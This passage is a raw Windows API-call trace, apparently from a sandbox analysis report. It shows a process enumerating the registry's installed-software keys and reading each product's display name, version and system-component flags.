hKey=0x1a4, lpSubKey="{9BE518E6-ECC6-35A9-88E4-87755C07200F}", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.186] RegQueryValueExA (in: hKey=0x1a8, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x0, lpData=0xe2175c, lpcbData=0xe21700*=0x80 | out: lpType=0x0, lpData=0xe2175c*=0x39, lpcbData=0xe21700*=0xf) returned 0x0 [0030.186] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.186] RegEnumKeyExA (in: hKey=0x1a4, dwIndex=0x1f, lpName=0xe2185c, lpcchName=0xe21744, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{AC76BA86-7AD7-FFFF-7B44-AA0000000001}", lpcchName=0xe21744, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0030.186] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{AC76BA86-7AD7-FFFF-7B44-AA0000000001}", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.186] RegQueryValueExA (in: hKey=0x1a8, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0) returned 0x2 [0030.186] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.186] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{AC76BA86-7AD7-FFFF-7B44-AA0000000001}", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.186] RegQueryValueExA (in: hKey=0x1a8, lpValueName="SystemComponent", lpReserved=0x0, lpType=0x0, lpData=0xe2172c, lpcbData=0xe21700*=0x4 | out: lpType=0x0, lpData=0xe2172c*=0x0, lpcbData=0xe21700*=0x4) returned 0x2 [0030.187] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.187] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{AC76BA86-7AD7-FFFF-7B44-AA0000000001}", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.187] RegQueryValueExA (in: hKey=0x1a8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0xe2175c, lpcbData=0xe21700*=0x80 | out: lpType=0x0, lpData=0xe2175c*=0x41, lpcbData=0xe21700*=0x13) returned 0x0 [0030.187] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.187] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{AC76BA86-7AD7-FFFF-7B44-AA0000000001}", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.187] RegQueryValueExA (in: hKey=0x1a8, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x0, lpData=0xe2175c, lpcbData=0xe21700*=0x80 | out: lpType=0x0, lpData=0xe2175c*=0x31, lpcbData=0xe21700*=0x7) returned 0x0 [0030.187] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.187] RegEnumKeyExA (in: hKey=0x1a4, dwIndex=0x20, lpName=0xe2185c, lpcchName=0xe21744, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{B175520C-86A2-35A7-8619-86DC379688B9}", lpcchName=0xe21744, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0030.187] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{B175520C-86A2-35A7-8619-86DC379688B9}", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.187] RegQueryValueExA (in: hKey=0x1a8, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0) returned 0x2 [0030.187] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.187] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{B175520C-86A2-35A7-8619-86DC379688B9}", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.187] RegQueryValueExA (in: hKey=0x1a8, lpValueName="SystemComponent", lpReserved=0x0, lpType=0x0, lpData=0xe2172c, lpcbData=0xe21700*=0x4 | out: lpType=0x0, lpData=0xe2172c*=0x1, lpcbData=0xe21700*=0x4) returned 0x0 [0030.187] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.187] RegEnumKeyExA (in: hKey=0x1a4, dwIndex=0x21, lpName=0xe2185c, lpcchName=0xe21744, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}", lpcchName=0xe21744, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0030.187] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.187] RegQueryValueExA (in: hKey=0x1a8, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0) returned 0x2 [0030.187] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.187] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.187] RegQueryValueExA (in: hKey=0x1a8, lpValueName="SystemComponent", lpReserved=0x0, lpType=0x0, lpData=0xe2172c, lpcbData=0xe21700*=0x4 | out: lpType=0x0, lpData=0xe2172c*=0x1, lpcbData=0xe21700*=0x4) returned 0x0 [0030.187] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.187] RegEnumKeyExA (in: hKey=0x1a4, dwIndex=0x22, lpName=0xe2185c, lpcchName=0xe21744, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", lpcchName=0xe21744, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0030.187] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.188] RegQueryValueExA (in: hKey=0x1a8, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0) returned 0x2 [0030.188] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.188] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.188] RegQueryValueExA (in: hKey=0x1a8, lpValueName="SystemComponent", lpReserved=0x0, lpType=0x0, lpData=0xe2172c, lpcbData=0xe21700*=0x4 | out: lpType=0x0, lpData=0xe2172c*=0x0, lpcbData=0xe21700*=0x4) returned 0x2 [0030.188] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.188] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.188] RegQueryValueExA (in: hKey=0x1a8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0xe2175c, lpcbData=0xe21700*=0x80 | out: lpType=0x0, lpData=0xe2175c*=0x4d, lpcbData=0xe21700*=0x3d) returned 0x0 [0030.188] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.188] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.188] RegQueryValueExA (in: hKey=0x1a8, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x0, lpData=0xe2175c, lpcbData=0xe21700*=0x80 | out: lpType=0x0, lpData=0xe2175c*=0x31, lpcbData=0xe21700*=0xd) returned 0x0 [0030.188] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.188] RegEnumKeyExA (in: hKey=0x1a4, dwIndex=0x23, lpName=0xe2185c, lpcchName=0xe21744, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{e52a6842-b0ac-476e-b48f-378a97a67346}", lpcchName=0xe21744, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0030.188] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{e52a6842-b0ac-476e-b48f-378a97a67346}", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.188] RegQueryValueExA (in: hKey=0x1a8, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0) returned 0x2 [0030.188] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.188] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{e52a6842-b0ac-476e-b48f-378a97a67346}", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.188] RegQueryValueExA (in: hKey=0x1a8, lpValueName="SystemComponent", lpReserved=0x0, lpType=0x0, lpData=0xe2172c, lpcbData=0xe21700*=0x4 | out: lpType=0x0, lpData=0xe2172c*=0x0, lpcbData=0xe21700*=0x4) returned 0x2 [0030.188] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.188] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{e52a6842-b0ac-476e-b48f-378a97a67346}", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.188] RegQueryValueExA (in: hKey=0x1a8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0xe2175c, lpcbData=0xe21700*=0x80 | out: lpType=0x0, lpData=0xe2175c*=0x4d, lpcbData=0xe21700*=0x3e) returned 0x0 [0030.188] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.188] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{e52a6842-b0ac-476e-b48f-378a97a67346}", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.188] RegQueryValueExA (in: hKey=0x1a8, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x0, lpData=0xe2175c, lpcbData=0xe21700*=0x80 | out: lpType=0x0, lpData=0xe2175c*=0x31, lpcbData=0xe21700*=0xe) returned 0x0 [0030.188] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.189] RegEnumKeyExA (in: hKey=0x1a4, dwIndex=0x24, lpName=0xe2185c, lpcchName=0xe21744, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{e6e75766-da0f-4ba2-9788-6ea593ce702d}", lpcchName=0xe21744, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0030.189] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{e6e75766-da0f-4ba2-9788-6ea593ce702d}", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.189] RegQueryValueExA (in: hKey=0x1a8, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0) returned 0x2 [0030.189] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.189] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{e6e75766-da0f-4ba2-9788-6ea593ce702d}", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.189] RegQueryValueExA (in: hKey=0x1a8, lpValueName="SystemComponent", lpReserved=0x0, lpType=0x0, lpData=0xe2172c, lpcbData=0xe21700*=0x4 | out: lpType=0x0, lpData=0xe2172c*=0x0, lpcbData=0xe21700*=0x4) returned 0x2 [0030.189] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.189] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{e6e75766-da0f-4ba2-9788-6ea593ce702d}", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.189] RegQueryValueExA (in: hKey=0x1a8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0xe2175c, lpcbData=0xe21700*=0x80 | out: lpType=0x0, lpData=0xe2175c*=0x4d, lpcbData=0xe21700*=0x3d) returned 0x0 [0030.189] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.189] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{e6e75766-da0f-4ba2-9788-6ea593ce702d}", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.189] RegQueryValueExA (in: hKey=0x1a8, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x0, lpData=0xe2175c, lpcbData=0xe21700*=0x80 | out: lpType=0x0, lpData=0xe2175c*=0x31, lpcbData=0xe21700*=0xd) returned 0x0 [0030.189] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.189] RegEnumKeyExA (in: hKey=0x1a4, dwIndex=0x25, lpName=0xe2185c, lpcchName=0xe21744, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}", lpcchName=0xe21744, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0030.189] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.189] RegQueryValueExA (in: hKey=0x1a8, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0) returned 0x2 [0030.189] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.189] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.189] RegQueryValueExA (in: hKey=0x1a8, lpValueName="SystemComponent", lpReserved=0x0, lpType=0x0, lpData=0xe2172c, lpcbData=0xe21700*=0x4 | out: lpType=0x0, lpData=0xe2172c*=0x0, lpcbData=0xe21700*=0x4) returned 0x2 [0030.189] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.189] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.189] RegQueryValueExA (in: hKey=0x1a8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0xe2175c, lpcbData=0xe21700*=0x80 | out: lpType=0x0, lpData=0xe2175c*=0x4d, lpcbData=0xe21700*=0x3c) returned 0x0 [0030.189] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.190] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.190] RegQueryValueExA (in: hKey=0x1a8, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x0, lpData=0xe2175c, lpcbData=0xe21700*=0x80 | out: lpType=0x0, lpData=0xe2175c*=0x31, lpcbData=0xe21700*=0xb) returned 0x0 [0030.190] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.190] RegEnumKeyExA (in: hKey=0x1a4, dwIndex=0x26, lpName=0xe2185c, lpcchName=0xe21744, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2151757", lpcchName=0xe21744, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0030.190] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2151757", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.190] RegQueryValueExA (in: hKey=0x1a8, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0) returned 0x2 [0030.190] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.190] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2151757", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.190] RegQueryValueExA (in: hKey=0x1a8, lpValueName="SystemComponent", lpReserved=0x0, lpType=0x0, lpData=0xe2172c, lpcbData=0xe21700*=0x4 | out: lpType=0x0, lpData=0xe2172c*=0x0, lpcbData=0xe21700*=0x4) returned 0x2 [0030.190] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.190] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2151757", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.190] RegQueryValueExA (in: hKey=0x1a8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0xe2175c, lpcbData=0xe21700*=0x80 | out: lpType=0x0, lpData=0xe2175c*=0x0, lpcbData=0xe21700*=0x80) returned 0x2 [0030.190] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.190] RegEnumKeyExA (in: hKey=0x1a4, dwIndex=0x27, lpName=0xe2185c, lpcchName=0xe21744, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2467173", lpcchName=0xe21744, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0030.246] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2467173", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.246] RegQueryValueExA (in: hKey=0x1a8, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0) returned 0x2 [0030.246] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.246] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2467173", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.246] RegQueryValueExA (in: hKey=0x1a8, lpValueName="SystemComponent", lpReserved=0x0, lpType=0x0, lpData=0xe2172c, lpcbData=0xe21700*=0x4 | out: lpType=0x0, lpData=0xe2172c*=0x0, lpcbData=0xe21700*=0x4) returned 0x2 [0030.246] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.246] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2467173", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.246] RegQueryValueExA (in: hKey=0x1a8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0xe2175c, lpcbData=0xe21700*=0x80 | out: lpType=0x0, lpData=0xe2175c*=0x0, lpcbData=0xe21700*=0x80) returned 0x2 [0030.246] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.246] RegEnumKeyExA (in: hKey=0x1a4, dwIndex=0x28, lpName=0xe2185c, lpcchName=0xe21744, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2524860", lpcchName=0xe21744, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0030.246] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2524860", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.246] RegQueryValueExA (in: hKey=0x1a8, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0) returned 0x2 [0030.246] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.246] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2524860", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.246] RegQueryValueExA (in: hKey=0x1a8, lpValueName="SystemComponent", lpReserved=0x0, lpType=0x0, lpData=0xe2172c, lpcbData=0xe21700*=0x4 | out: lpType=0x0, lpData=0xe2172c*=0x0, lpcbData=0xe21700*=0x4) returned 0x2 [0030.246] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.246] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2524860", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.246] RegQueryValueExA (in: hKey=0x1a8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0xe2175c, lpcbData=0xe21700*=0x80 | out: lpType=0x0, lpData=0xe2175c*=0x0, lpcbData=0xe21700*=0x80) returned 0x2 [0030.246] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.246] RegEnumKeyExA (in: hKey=0x1a4, dwIndex=0x29, lpName=0xe2185c, lpcchName=0xe21744, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2544655", lpcchName=0xe21744, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0030.246] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2544655", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.247] RegQueryValueExA (in: hKey=0x1a8, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0) returned 0x2 [0030.247] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.247] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2544655", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.247] RegQueryValueExA (in: hKey=0x1a8, lpValueName="SystemComponent", lpReserved=0x0, lpType=0x0, lpData=0xe2172c, lpcbData=0xe21700*=0x4 | out: lpType=0x0, lpData=0xe2172c*=0x0, lpcbData=0xe21700*=0x4) returned 0x2 [0030.247] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.247] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2544655", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.247] RegQueryValueExA (in: hKey=0x1a8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0xe2175c, lpcbData=0xe21700*=0x80 | out: lpType=0x0, lpData=0xe2175c*=0x0, lpcbData=0xe21700*=0x80) returned 0x2 [0030.247] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.247] RegEnumKeyExA (in: hKey=0x1a4, dwIndex=0x2a, lpName=0xe2185c, lpcchName=0xe21744, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2549743", lpcchName=0xe21744, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0030.247] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2549743", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.247] RegQueryValueExA (in: hKey=0x1a8, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0) returned 0x2 [0030.247] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.247] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2549743", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.247] RegQueryValueExA (in: hKey=0x1a8, lpValueName="SystemComponent", lpReserved=0x0, lpType=0x0, lpData=0xe2172c, lpcbData=0xe21700*=0x4 | out: lpType=0x0, lpData=0xe2172c*=0x0, lpcbData=0xe21700*=0x4) returned 0x2 [0030.247] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.247] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2549743", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.247] RegQueryValueExA (in: hKey=0x1a8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0xe2175c, lpcbData=0xe21700*=0x80 | out: lpType=0x0, lpData=0xe2175c*=0x0, lpcbData=0xe21700*=0x80) returned 0x2 [0030.247] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.247] RegEnumKeyExA (in: hKey=0x1a4, dwIndex=0x2b, lpName=0xe2185c, lpcchName=0xe21744, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2565063", lpcchName=0xe21744, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0030.247] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2565063", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.247] RegQueryValueExA (in: hKey=0x1a8, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0) returned 0x2 [0030.247] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.247] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2565063", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.247] RegQueryValueExA (in: hKey=0x1a8, lpValueName="SystemComponent", lpReserved=0x0, lpType=0x0, lpData=0xe2172c, lpcbData=0xe21700*=0x4 | out: lpType=0x0, lpData=0xe2172c*=0x0, 